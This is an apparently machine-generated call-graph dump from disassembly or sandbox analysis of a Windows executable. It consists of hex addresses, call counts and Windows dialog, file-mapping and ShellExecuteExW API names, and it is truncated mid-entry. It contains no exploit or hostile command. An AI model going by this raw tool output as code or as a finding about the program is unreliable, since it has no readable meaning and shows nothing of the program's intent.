VirtualQuery GetSystemInfo 26334->26336 26336->26333 26342 7ff6e7e403e0 26343 7ff6e7e40497 26342->26343 26344 7ff6e7e4041f 26342->26344 26345 7ff6e7e2aae0 48 API calls 26343->26345 26346 7ff6e7e2aae0 48 API calls 26344->26346 26347 7ff6e7e404ab 26345->26347 26348 7ff6e7e40433 26346->26348 26350 7ff6e7e2da98 48 API calls 26347->26350 26349 7ff6e7e2da98 48 API calls 26348->26349 26354 7ff6e7e40442 BuildCatchObjectHelperInternal 26349->26354 26350->26354 26351 7ff6e7e11fa0 31 API calls 26352 7ff6e7e40541 26351->26352 26367 7ff6e7e1250c 26352->26367 26353 7ff6e7e405cc 26357 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26353->26357 26354->26351 26354->26353 26366 7ff6e7e405c6 26354->26366 26356 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26356->26353 26359 7ff6e7e405d2 26357->26359 26366->26356 26368 7ff6e7e12516 SetDlgItemTextW 26367->26368 26369 7ff6e7e12513 26367->26369 26369->26368 28410 7ff6e7e411cf 28411 7ff6e7e41102 28410->28411 28412 7ff6e7e41900 _com_raise_error 14 API calls 28411->28412 28413 7ff6e7e41141 28412->28413 26388 7ff6e7e41491 26389 7ff6e7e413c9 26388->26389 26389->26388 26390 7ff6e7e41900 _com_raise_error 14 API calls 26389->26390 26390->26389 26391 7ff6e7e3b190 26734 7ff6e7e1255c 26391->26734 26393 7ff6e7e3b1db 26394 7ff6e7e3b1ef 26393->26394 26395 7ff6e7e3be93 26393->26395 26547 7ff6e7e3b20c 26393->26547 26398 7ff6e7e3b2db 26394->26398 26399 7ff6e7e3b1ff 26394->26399 26394->26547 27000 7ff6e7e3f390 26395->27000 26397 7ff6e7e42320 _handle_error 8 API calls 26401 7ff6e7e3c350 26397->26401 26404 7ff6e7e3b391 26398->26404 26410 7ff6e7e3b2f5 26398->26410 26402 7ff6e7e3b2a9 26399->26402 26403 7ff6e7e3b207 26399->26403 26409 7ff6e7e3b2cb EndDialog 26402->26409 26402->26547 26414 7ff6e7e2aae0 48 API calls 26403->26414 26403->26547 26742 7ff6e7e122bc GetDlgItem 26404->26742 26405 7ff6e7e3bec9 26407 7ff6e7e3bef0 GetDlgItem IsDlgButtonChecked 26405->26407 26408 7ff6e7e3bed5 SendDlgItemMessageW 26405->26408 26406 7ff6e7e3beba IsDlgButtonChecked 26406->26405 26413 7ff6e7e262dc 35 API calls 26407->26413 26408->26407 26409->26547 26415 7ff6e7e2aae0 48 API calls 26410->26415 26417 7ff6e7e3bf47 GetDlgItem 26413->26417 26418 7ff6e7e3b236 26414->26418 26419 7ff6e7e3b313 SetDlgItemTextW 26415->26419 26416 7ff6e7e3b3b1 EndDialog 26593 7ff6e7e3b3da 26416->26593 27019 7ff6e7e12520 26417->27019 27023 7ff6e7e11ec4 34 API calls _handle_error 26418->27023 26423 7ff6e7e3b326 26419->26423 26422 7ff6e7e3b408 GetDlgItem 26427 7ff6e7e3b44f SetFocus 26422->26427 26428 7ff6e7e3b422 IsDlgButtonChecked IsDlgButtonChecked 26422->26428 26431 7ff6e7e3b340 GetMessageW 26423->26431 26423->26547 26426 7ff6e7e3b246 26430 7ff6e7e3b25c 26426->26430 26436 7ff6e7e1250c SetDlgItemTextW 26426->26436 26432 7ff6e7e3b465 26427->26432 26433 7ff6e7e3b4f2 26427->26433 26428->26427 26449 7ff6e7e3c363 26430->26449 26430->26547 26438 7ff6e7e3b35e IsDialogMessageW 26431->26438 26431->26547 26439 7ff6e7e2aae0 48 API calls 26432->26439 26756 7ff6e7e18d04 26433->26756 26434 7ff6e7e11fa0 31 API calls 26434->26547 26436->26430 26438->26423 26444 7ff6e7e3b373 TranslateMessage DispatchMessageW 26438->26444 26445 7ff6e7e3b46f 26439->26445 26440 7ff6e7e3bcc5 26441 7ff6e7e2aae0 48 API calls 26440->26441 26446 7ff6e7e3bcd6 SetDlgItemTextW 26441->26446 26443 7ff6e7e3b52c 26766 7ff6e7e3ef80 26443->26766 26444->26423 26454 7ff6e7e1129c 33 API calls 26445->26454 26450 7ff6e7e2aae0 48 API calls 26446->26450 26451 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26449->26451 26455 7ff6e7e3bd08 26450->26455 26456 7ff6e7e3c368 26451->26456 26461 7ff6e7e3b498 26454->26461 26472 7ff6e7e1129c 33 API calls 26455->26472 26467 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26456->26467 26459 7ff6e7e2aae0 48 API calls 26460 7ff6e7e3b555 26459->26460 26464 7ff6e7e2da98 48 API calls 26460->26464 26465 7ff6e7e3f0a4 24 API calls 26461->26465 26470 7ff6e7e3b568 26464->26470 26471 7ff6e7e3b4a5 26465->26471 26474 7ff6e7e3c36e 26467->26474 26780 7ff6e7e3f0a4 26470->26780 26471->26456 26492 7ff6e7e3b4e8 26471->26492 26500 7ff6e7e3bd31 26472->26500 26484 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26474->26484 26482 7ff6e7e3bdda 26493 7ff6e7e2aae0 48 API calls 26482->26493 26494 7ff6e7e3c374 26484->26494 26488 7ff6e7e11fa0 31 API calls 26498 7ff6e7e3b586 26488->26498 26491 7ff6e7e3b5ec 26503 7ff6e7e3b61a 26491->26503 27025 7ff6e7e232a8 26491->27025 26492->26491 27024 7ff6e7e3fa80 33 API calls 2 library calls 26492->27024 26505 7ff6e7e3bde4 26493->26505 26510 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26494->26510 26498->26474 26498->26492 26500->26482 26511 7ff6e7e1129c 33 API calls 26500->26511 26794 7ff6e7e22f58 26503->26794 26522 7ff6e7e1129c 33 API calls 26505->26522 26516 7ff6e7e3c37a 26510->26516 26517 7ff6e7e3bd7f 26511->26517 26528 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26516->26528 26524 7ff6e7e2aae0 48 API calls 26517->26524 26520 7ff6e7e3b64c 26806 7ff6e7e27fc4 26520->26806 26521 7ff6e7e3b634 GetLastError 26521->26520 26527 7ff6e7e3be0d 26522->26527 26530 7ff6e7e3bd8a 26524->26530 26526 7ff6e7e3b60e 27028 7ff6e7e39d90 12 API calls _handle_error 26526->27028 26538 7ff6e7e1129c 33 API calls 26527->26538 26529 7ff6e7e3c380 26528->26529 26539 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26529->26539 26535 7ff6e7e11150 33 API calls 26530->26535 26541 7ff6e7e3bda2 26535->26541 26537 7ff6e7e3b65e 26543 7ff6e7e3b665 GetLastError 26537->26543 26544 7ff6e7e3b674 26537->26544 26552 7ff6e7e3be4e 26538->26552 26545 7ff6e7e3c386 26539->26545 26550 7ff6e7e12034 33 API calls 26541->26550 26543->26544 26548 7ff6e7e3b68b GetTickCount 26544->26548 26555 7ff6e7e3b72b 26544->26555 26637 7ff6e7e3b71c 26544->26637 26549 7ff6e7e1255c 61 API calls 26545->26549 26547->26397 26809 7ff6e7e14228 26548->26809 26553 7ff6e7e3c3e4 26549->26553 26556 7ff6e7e3bdbe 26550->26556 26558 7ff6e7e11fa0 31 API calls 26552->26558 26559 7ff6e7e3c3e8 26553->26559 26567 7ff6e7e3c489 GetDlgItem SetFocus 26553->26567 26615 7ff6e7e3c3fd 26553->26615 26554 7ff6e7e3ba50 26554->26416 27037 7ff6e7e1bd0c 33 API calls 26554->27037 26555->26554 26562 7ff6e7e26454 34 API calls 26555->26562 26563 7ff6e7e11fa0 31 API calls 26556->26563 26565 7ff6e7e3be78 26558->26565 26574 7ff6e7e42320 _handle_error 8 API calls 26559->26574 26568 7ff6e7e3b74e 26562->26568 26569 7ff6e7e3bdcc 26563->26569 26572 7ff6e7e11fa0 31 API calls 26565->26572 26566 7ff6e7e3ba75 27038 7ff6e7e11150 26566->27038 26578 7ff6e7e3c4ba 26567->26578 27029 7ff6e7e2b914 102 API calls 26568->27029 26577 7ff6e7e11fa0 31 API calls 26569->26577 26570 7ff6e7e3b6ba 26579 7ff6e7e11fa0 31 API calls 26570->26579 26571 7ff6e7e3bb79 26580 7ff6e7e2aae0 48 API calls 26571->26580 26581 7ff6e7e3be83 26572->26581 26583 7ff6e7e3ca97 26574->26583 26577->26482 26591 7ff6e7e1129c 33 API calls 26578->26591 26585 7ff6e7e3b6c8 26579->26585 26586 7ff6e7e3bba7 SetDlgItemTextW 26580->26586 26587 7ff6e7e11fa0 31 API calls 26581->26587 26582 7ff6e7e3ba8a 26588 7ff6e7e2aae0 48 API calls 26582->26588 26584 7ff6e7e3b768 26590 7ff6e7e2da98 48 API calls 26584->26590 26819 7ff6e7e22134 26585->26819 26592 7ff6e7e12534 26586->26592 26587->26593 26594 7ff6e7e3ba97 26588->26594 26589 7ff6e7e3c434 SendDlgItemMessageW 26595 7ff6e7e3c45d EndDialog 26589->26595 26596 7ff6e7e3c454 26589->26596 26597 7ff6e7e3b7aa GetCommandLineW 26590->26597 26598 7ff6e7e3c4cc 26591->26598 26599 7ff6e7e3bbc5 SetDlgItemTextW GetDlgItem 26592->26599 26593->26434 26600 7ff6e7e11150 33 API calls 26594->26600 26595->26559 26596->26595 26601 7ff6e7e3b869 26597->26601 26602 7ff6e7e3b84f 26597->26602 27042 7ff6e7e280d8 33 API calls 26598->27042 26606 7ff6e7e3bbf0 GetWindowLongPtrW SetWindowLongPtrW 26599->26606 26607 7ff6e7e3bc13 26599->26607 26608 7ff6e7e3baaa 26600->26608 27030 7ff6e7e3ab54 33 API calls _handle_error 26601->27030 26622 7ff6e7e120b0 33 API calls 26602->26622 26606->26607 26835 7ff6e7e3ce88 26607->26835 26614 7ff6e7e11fa0 31 API calls 26608->26614 26609 7ff6e7e3c4e0 26610 7ff6e7e1250c SetDlgItemTextW 26609->26610 26616 7ff6e7e3c4f4 26610->26616 26611 7ff6e7e3b87a 27031 7ff6e7e3ab54 33 API calls _handle_error 26611->27031 26621 7ff6e7e3bab5 26614->26621 26615->26559 26615->26589 26627 7ff6e7e3c526 SendDlgItemMessageW FindFirstFileW 26616->26627 26618 7ff6e7e3b6f5 GetLastError 26619 7ff6e7e3b704 26618->26619 26624 7ff6e7e2204c 100 API calls 26619->26624 26626 7ff6e7e11fa0 31 API calls 26621->26626 26622->26601 26623 7ff6e7e3b88b 27032 7ff6e7e3ab54 33 API calls _handle_error 26623->27032 26629 7ff6e7e3b711 26624->26629 26625 7ff6e7e3ce88 160 API calls 26630 7ff6e7e3bc3c 26625->26630 26631 7ff6e7e3bac3 26626->26631 26632 7ff6e7e3c57b 26627->26632 26726 7ff6e7e3ca04 26627->26726 26634 7ff6e7e11fa0 31 API calls 26629->26634 26985 7ff6e7e3f974 26630->26985 26642 7ff6e7e2aae0 48 API calls 26631->26642 26643 7ff6e7e2aae0 48 API calls 26632->26643 26633 7ff6e7e3b89c 27033 7ff6e7e2b9b4 102 API calls 26633->27033 26634->26637 26637->26555 26637->26571 26639 7ff6e7e3b8b3 27034 7ff6e7e3fbdc 33 API calls 26639->27034 26640 7ff6e7e3ca81 26640->26559 26641 7ff6e7e3ce88 160 API calls 26656 7ff6e7e3bc6a 26641->26656 26646 7ff6e7e3badb 26642->26646 26647 7ff6e7e3c59e 26643->26647 26645 7ff6e7e3caa9 26649 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26645->26649 26657 7ff6e7e1129c 33 API calls 26646->26657 26659 7ff6e7e1129c 33 API calls 26647->26659 26648 7ff6e7e3b8d2 CreateFileMappingW 26651 7ff6e7e3b911 MapViewOfFile 26648->26651 26652 7ff6e7e3b953 ShellExecuteExW 26648->26652 26653 7ff6e7e3caae 26649->26653 26650 7ff6e7e3bc96 26999 7ff6e7e12298 GetDlgItem EnableWindow 26650->26999 27035 7ff6e7e43640 26651->27035 26674 7ff6e7e3b974 26652->26674 26660 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26653->26660 26656->26650 26661 7ff6e7e3ce88 160 API calls 26656->26661 26668 7ff6e7e3bb04 26657->26668 26658 7ff6e7e3b3f5 26658->26416 26658->26440 26662 7ff6e7e3c5cd 26659->26662 26663 7ff6e7e3cab4 26660->26663 26661->26650 26664 7ff6e7e11150 33 API calls 26662->26664 26667 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26663->26667 26665 7ff6e7e3c5e8 26664->26665 27043 7ff6e7e1e164 33 API calls 2 library calls 26665->27043 26666 7ff6e7e3b9c3 26675 7ff6e7e3b9dc UnmapViewOfFile CloseHandle 26666->26675 26676 7ff6e7e3b9ef 26666->26676 26672 7ff6e7e3caba 26667->26672 26668->26516 26669 7ff6e7e3bb5a 26668->26669 26670 7ff6e7e11fa0 31 API calls 26669->26670 26670->26416 26679 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26672->26679 26673 7ff6e7e3c5ff 26677 7ff6e7e11fa0 31 API calls 26673->26677 26674->26666 26682 7ff6e7e3b9b1 Sleep 26674->26682 26675->26676 26676->26494 26678 7ff6e7e3ba25 26676->26678 26681 7ff6e7e3c60c 26677->26681 26680 7ff6e7e11fa0 31 API calls 26678->26680 26683 7ff6e7e3cac0 26679->26683 26684 7ff6e7e3ba42 26680->26684 26681->26653 26686 7ff6e7e11fa0 31 API calls 26681->26686 26682->26666 26682->26674 26687 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26683->26687 26685 7ff6e7e11fa0 31 API calls 26684->26685 26685->26554 26688 7ff6e7e3c673 26686->26688 26689 7ff6e7e3cac6 26687->26689 26690 7ff6e7e1250c SetDlgItemTextW 26688->26690 26691 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26689->26691 26692 7ff6e7e3c687 FindClose 26690->26692 26693 7ff6e7e3cacc 26691->26693 26694 7ff6e7e3c797 SendDlgItemMessageW 26692->26694 26695 7ff6e7e3c6a3 26692->26695 26696 7ff6e7e3c7cb 26694->26696 27044 7ff6e7e3a2cc 10 API calls _handle_error 26695->27044 26699 7ff6e7e2aae0 48 API calls 26696->26699 26698 7ff6e7e3c6c6 26700 7ff6e7e2aae0 48 API calls 26698->26700 26702 7ff6e7e3c7d8 26699->26702 26701 7ff6e7e3c6cf 26700->26701 26703 7ff6e7e2da98 48 API calls 26701->26703 26704 7ff6e7e1129c 33 API calls 26702->26704 26707 7ff6e7e3c6ec BuildCatchObjectHelperInternal 26703->26707 26706 7ff6e7e3c807 26704->26706 26705 7ff6e7e11fa0 31 API calls 26708 7ff6e7e3c783 26705->26708 26709 7ff6e7e11150 33 API calls 26706->26709 26707->26663 26707->26705 26710 7ff6e7e1250c SetDlgItemTextW 26708->26710 26711 7ff6e7e3c822 26709->26711 26710->26694 27045 7ff6e7e1e164 33 API calls 2 library calls 26711->27045 26713 7ff6e7e3c839 26714 7ff6e7e11fa0 31 API calls 26713->26714 26715 7ff6e7e3c845 BuildCatchObjectHelperInternal 26714->26715 26716 7ff6e7e11fa0 31 API calls 26715->26716 26717 7ff6e7e3c87f 26716->26717 26718 7ff6e7e11fa0 31 API calls 26717->26718 26719 7ff6e7e3c88c 26718->26719 26719->26672 26720 7ff6e7e11fa0 31 API calls 26719->26720 26721 7ff6e7e3c8f3 26720->26721 26722 7ff6e7e1250c SetDlgItemTextW 26721->26722 26723 7ff6e7e3c907 26722->26723 26723->26726 27046 7ff6e7e3a2cc 10 API calls _handle_error 26723->27046 26725 7ff6e7e3c932 26727 7ff6e7e2aae0 48 API calls 26725->26727 26726->26559 26726->26640 26726->26645 26726->26689 26728 7ff6e7e3c93c 26727->26728 26729 7ff6e7e2da98 48 API calls 26728->26729 26731 7ff6e7e3c959 BuildCatchObjectHelperInternal 26729->26731 26730 7ff6e7e11fa0 31 API calls 26732 7ff6e7e3c9f0 26730->26732 26731->26683 26731->26730 26733 7ff6e7e1250c SetDlgItemTextW 26732->26733 26733->26726 26735 7ff6e7e1256a 26734->26735 26736 7ff6e7e125d0 26734->26736 26735->26736 27047 7ff6e7e2a4ac 26735->27047 26736->26393 26738 7ff6e7e1258f 26738->26736 26739 7ff6e7e125a4 GetDlgItem 26738->26739 26739->26736 26740 7ff6e7e125b7 26739->26740 26740->26736 26741 7ff6e7e125be SetDlgItemTextW 26740->26741 26741->26736 26743 7ff6e7e122fc 26742->26743 26744 7ff6e7e12334 26742->26744 26746 7ff6e7e1129c 33 API calls 26743->26746 27096 7ff6e7e123f8 GetWindowTextLengthW 26744->27096 26747 7ff6e7e1232a BuildCatchObjectHelperInternal 26746->26747 26748 7ff6e7e11fa0 31 API calls 26747->26748 26752 7ff6e7e12389 26747->26752 26748->26752 26749 7ff6e7e123c8 26750 7ff6e7e42320 _handle_error 8 API calls 26749->26750 26751 7ff6e7e123dd 26750->26751 26751->26416 26751->26422 26751->26658 26752->26749 26753 7ff6e7e123f0 26752->26753 26754 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26753->26754 26755 7ff6e7e123f5 26754->26755 26758 7ff6e7e18d34 26756->26758 26764 7ff6e7e18de8 26756->26764 26760 7ff6e7e18d91 26758->26760 26761 7ff6e7e18de3 26758->26761 26763 7ff6e7e18d42 BuildCatchObjectHelperInternal 26758->26763 26760->26763 26765 7ff6e7e421d0 33 API calls 26760->26765 27108 7ff6e7e11f80 33 API calls 3 library calls 26761->27108 26763->26443 27109 7ff6e7e12004 33 API calls std::_Xinvalid_argument 26764->27109 26765->26763 26769 7ff6e7e3efb0 26766->26769 26767 7ff6e7e3efd7 26768 7ff6e7e42320 _handle_error 8 API calls 26767->26768 26770 7ff6e7e3b537 26768->26770 26769->26767 27110 7ff6e7e1bd0c 33 API calls 26769->27110 26770->26459 26772 7ff6e7e3f02a 26773 7ff6e7e11150 33 API calls 26772->26773 26774 7ff6e7e3f03f 26773->26774 26776 7ff6e7e11fa0 31 API calls 26774->26776 26778 7ff6e7e3f04f BuildCatchObjectHelperInternal 26774->26778 26775 7ff6e7e11fa0 31 API calls 26777 7ff6e7e3f076 26775->26777 26776->26778 26779 7ff6e7e11fa0 31 API calls 26777->26779 26778->26775 26779->26767 27111 7ff6e7e3ae1c PeekMessageW 26780->27111 26783 7ff6e7e3f0f5 26787 7ff6e7e3f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26783->26787 26784 7ff6e7e3f143 IsDlgButtonChecked IsDlgButtonChecked 26785 7ff6e7e3f189 26784->26785 26786 7ff6e7e3f1a4 IsDlgButtonChecked 26784->26786 26785->26786 26788 7ff6e7e3f1c6 IsDlgButtonChecked IsDlgButtonChecked 26786->26788 26789 7ff6e7e3f1c3 26786->26789 26787->26784 26790 7ff6e7e3f218 IsDlgButtonChecked 26788->26790 26791 7ff6e7e3f1f3 IsDlgButtonChecked 26788->26791 26789->26788 26792 7ff6e7e42320 _handle_error 8 API calls 26790->26792 26791->26790 26793 7ff6e7e3b578 26792->26793 26793->26488 26795 7ff6e7e2309d 26794->26795 26802 7ff6e7e22f8e 26794->26802 26796 7ff6e7e42320 _handle_error 8 API calls 26795->26796 26797 7ff6e7e230b3 26796->26797 26797->26520 26797->26521 26798 7ff6e7e23077 26798->26795 26799 7ff6e7e23684 56 API calls 26798->26799 26799->26795 26800 7ff6e7e1129c 33 API calls 26800->26802 26802->26798 26802->26800 26803 7ff6e7e230c8 26802->26803 27116 7ff6e7e23684 26802->27116 26804 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26803->26804 26805 7ff6e7e230cd 26804->26805 26807 7ff6e7e27fcf 26806->26807 26808 7ff6e7e27fd2 SetCurrentDirectoryW 26806->26808 26807->26808 26808->26537 26811 7ff6e7e14255 26809->26811 26810 7ff6e7e1426a 26813 7ff6e7e42320 _handle_error 8 API calls 26810->26813 26811->26810 26812 7ff6e7e1129c 33 API calls 26811->26812 26812->26810 26814 7ff6e7e142a1 26813->26814 26815 7ff6e7e13c84 26814->26815 26816 7ff6e7e13cab 26815->26816 27150 7ff6e7e1710c 26816->27150 26818 7ff6e7e13cbb BuildCatchObjectHelperInternal 26818->26570 26821 7ff6e7e2216a 26819->26821 26820 7ff6e7e2219e 26823 7ff6e7e2227f 26820->26823 26825 7ff6e7e26a0c 49 API calls 26820->26825 26821->26820 26822 7ff6e7e221b1 CreateFileW 26821->26822 26822->26820 26824 7ff6e7e222af 26823->26824 26830 7ff6e7e120b0 33 API calls 26823->26830 26827 7ff6e7e42320 _handle_error 8 API calls 26824->26827 26826 7ff6e7e22209 26825->26826 26828 7ff6e7e22246 26826->26828 26829 7ff6e7e2220d CreateFileW 26826->26829 26831 7ff6e7e222c4 26827->26831 26828->26823 26832 7ff6e7e222d8 26828->26832 26829->26828 26830->26824 26831->26618 26831->26619 26833 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26832->26833 26834 7ff6e7e222dd 26833->26834 27162 7ff6e7e3aa08 26835->27162 26837 7ff6e7e3d1ee 26838 7ff6e7e11fa0 31 API calls 26837->26838 26839 7ff6e7e3d1f7 26838->26839 26840 7ff6e7e42320 _handle_error 8 API calls 26839->26840 26842 7ff6e7e3bc2b 26840->26842 26841 7ff6e7e2d22c 33 API calls 26927 7ff6e7e3cf03 BuildCatchObjectHelperInternal 26841->26927 26842->26625 26843 7ff6e7e3eefa 27287 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 26843->27287 26846 7ff6e7e3ef00 27288 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 26846->27288 26848 7ff6e7e3ef06 26853 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26848->26853 26850 7ff6e7e3eeee 26851 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26850->26851 26852 7ff6e7e3eef4 26851->26852 27286 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 26852->27286 26855 7ff6e7e3ef0c 26853->26855 26857 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26855->26857 26858 7ff6e7e3ef12 26857->26858 26863 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26858->26863 26859 7ff6e7e3ee4a 26860 7ff6e7e3eed2 26859->26860 26864 7ff6e7e120b0 33 API calls 26859->26864 27284 7ff6e7e11f80 33 API calls 3 library calls 26860->27284 26861 7ff6e7e3eee8 27285 7ff6e7e12004 33 API calls std::_Xinvalid_argument 26861->27285 26862 7ff6e7e113a4 33 API calls 26866 7ff6e7e3dc3a GetTempPathW 26862->26866 26867 7ff6e7e3ef18 26863->26867 26865 7ff6e7e3ee77 26864->26865 27283 7ff6e7e3abe8 33 API calls 3 library calls 26865->27283 26866->26927 26875 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26867->26875 26868 7ff6e7e262dc 35 API calls 26868->26927 26873 7ff6e7e3ee8d 26881 7ff6e7e11fa0 31 API calls 26873->26881 26884 7ff6e7e3eea4 BuildCatchObjectHelperInternal 26873->26884 26874 7ff6e7e12520 SetDlgItemTextW 26874->26927 26879 7ff6e7e3ef1e 26875->26879 26878 7ff6e7e4bb8c 43 API calls 26878->26927 26885 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26879->26885 26880 7ff6e7e3e7f3 26880->26860 26880->26861 26883 7ff6e7e421d0 33 API calls 26880->26883 26895 7ff6e7e3e83b BuildCatchObjectHelperInternal 26880->26895 26881->26884 26882 7ff6e7e11fa0 31 API calls 26882->26860 26883->26895 26884->26882 26887 7ff6e7e3ef24 26885->26887 26886 7ff6e7e3aa08 33 API calls 26886->26927 26893 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26887->26893 26889 7ff6e7e3ef6c 27291 7ff6e7e12004 33 API calls std::_Xinvalid_argument 26889->27291 26890 7ff6e7e11fa0 31 API calls 26890->26859 26891 7ff6e7e3ef78 27293 7ff6e7e12004 33 API calls std::_Xinvalid_argument 26891->27293 26892 7ff6e7e3ec72 BuildCatchObjectHelperInternal 27205 7ff6e7e3f4e0 26892->27205 26899 7ff6e7e3ef2a 26893->26899 26894 7ff6e7e23f30 54 API calls 26894->26927 26902 7ff6e7e120b0 33 API calls 26895->26902 26945 7ff6e7e3eb8f 26895->26945 26897 7ff6e7e3ef72 27292 7ff6e7e11f80 33 API calls 3 library calls 26897->27292 26910 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26899->26910 26911 7ff6e7e3e963 26902->26911 26905 7ff6e7e3ed3b BuildCatchObjectHelperInternal 26905->26890 26906 7ff6e7e3ed40 26906->26891 26906->26897 26906->26905 26929 7ff6e7e421d0 33 API calls 26906->26929 26908 7ff6e7e3ec2a 26908->26889 26908->26892 26908->26905 26920 7ff6e7e421d0 33 API calls 26908->26920 26928 7ff6e7e3ef66 26908->26928 26909 7ff6e7e12674 31 API calls 26909->26927 26917 7ff6e7e3ef30 26910->26917 26919 7ff6e7e1129c 33 API calls 26911->26919 26954 7ff6e7e3ef60 26911->26954 26913 7ff6e7e3d5e9 GetDlgItem 26921 7ff6e7e12520 SetDlgItemTextW 26913->26921 26914 7ff6e7e2dc2c 33 API calls 26914->26927 26916 7ff6e7e1e164 33 API calls 26916->26927 26924 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26917->26924 26918 7ff6e7e23d34 51 API calls 26918->26927 26925 7ff6e7e3e9a6 26919->26925 26920->26892 26926 7ff6e7e3d608 IsDlgButtonChecked 26921->26926 26930 7ff6e7e3ef36 26924->26930 27279 7ff6e7e2d22c 26925->27279 26926->26927 26927->26837 26927->26841 26927->26843 26927->26846 26927->26848 26927->26850 26927->26852 26927->26855 26927->26858 26927->26859 26927->26862 26927->26867 26927->26868 26927->26874 26927->26878 26927->26879 26927->26880 26927->26886 26927->26887 26927->26894 26927->26899 26927->26909 26927->26914 26927->26916 26927->26917 26927->26918 26927->26930 26933 7ff6e7e25b60 53 API calls 26927->26933 26935 7ff6e7e3d63c IsDlgButtonChecked 26927->26935 26936 7ff6e7e3ef3c 26927->26936 26938 7ff6e7e25aa8 33 API calls 26927->26938 26946 7ff6e7e3ef42 26927->26946 26952 7ff6e7e14228 33 API calls 26927->26952 26955 7ff6e7e232a8 51 API calls 26927->26955 26957 7ff6e7e25820 33 API calls 26927->26957 26959 7ff6e7e1250c SetDlgItemTextW 26927->26959 26961 7ff6e7e27df4 47 API calls 26927->26961 26962 7ff6e7e11150 33 API calls 26927->26962 26966 7ff6e7e399c8 31 API calls 26927->26966 26969 7ff6e7e11fa0 31 API calls 26927->26969 26970 7ff6e7e3df99 EndDialog 26927->26970 26972 7ff6e7e232bc 51 API calls 26927->26972 26975 7ff6e7e3db21 MoveFileW 26927->26975 26979 7ff6e7e120b0 33 API calls 26927->26979 26980 7ff6e7e22f58 56 API calls 26927->26980 26981 7ff6e7e12034 33 API calls 26927->26981 26983 7ff6e7e18d04 33 API calls 26927->26983 26984 7ff6e7e1129c 33 API calls 26927->26984 27166 7ff6e7e313c4 CompareStringW 26927->27166 27167 7ff6e7e3a440 26927->27167 27243 7ff6e7e2cfa4 35 API calls _invalid_parameter_noinfo_noreturn 26927->27243 27244 7ff6e7e395b4 33 API calls Concurrency::cancel_current_task 26927->27244 27245 7ff6e7e40684 31 API calls _invalid_parameter_noinfo_noreturn 26927->27245 27246 7ff6e7e1df4c 47 API calls BuildCatchObjectHelperInternal 26927->27246 27247 7ff6e7e3a834 33 API calls _invalid_parameter_noinfo_noreturn 26927->27247 27248 7ff6e7e39518 33 API calls 26927->27248 27249 7ff6e7e3abe8 33 API calls 3 library calls 26927->27249 27250 7ff6e7e27368 33 API calls 2 library calls 26927->27250 27251 7ff6e7e24088 33 API calls 26927->27251 27252 7ff6e7e265b0 33 API calls 3 library calls 26927->27252 27253 7ff6e7e272cc 26927->27253 27257 7ff6e7e11744 33 API calls 4 library calls 26927->27257 27258 7ff6e7e231bc 26927->27258 27272 7ff6e7e23ea0 FindClose 26927->27272 27273 7ff6e7e313f4 CompareStringW 26927->27273 27274 7ff6e7e39cd0 47 API calls 26927->27274 27275 7ff6e7e387d8 51 API calls 3 library calls 26927->27275 27276 7ff6e7e3ab54 33 API calls _handle_error 26927->27276 27277 7ff6e7e25b08 CompareStringW 26927->27277 27278 7ff6e7e27eb0 47 API calls 26927->27278 27290 7ff6e7e11f80 33 API calls 3 library calls 26928->27290 26929->26905 26934 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26930->26934 26933->26927 26934->26936 26935->26927 26941 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26936->26941 26938->26927 26941->26946 26943 7ff6e7e1129c 33 API calls 26973 7ff6e7e3e9d1 26943->26973 26944 7ff6e7e3ef54 26948 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26944->26948 26945->26906 26945->26908 26945->26944 26947 7ff6e7e3ef5a 26945->26947 26953 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26946->26953 26951 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26947->26951 26948->26947 26949 7ff6e7e313c4 CompareStringW 26949->26973 26951->26954 26952->26927 26956 7ff6e7e3ef48 26953->26956 27289 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 26954->27289 26955->26927 26958 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26956->26958 26957->26927 26960 7ff6e7e3ef4e 26958->26960 26959->26927 26964 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26960->26964 26961->26927 26962->26927 26964->26944 26966->26927 26967 7ff6e7e11fa0 31 API calls 26967->26973 26969->26927 26970->26927 26972->26927 26973->26943 26973->26945 26973->26949 26973->26956 26973->26960 26973->26967 26974 7ff6e7e2d22c 33 API calls 26973->26974 26974->26973 26976 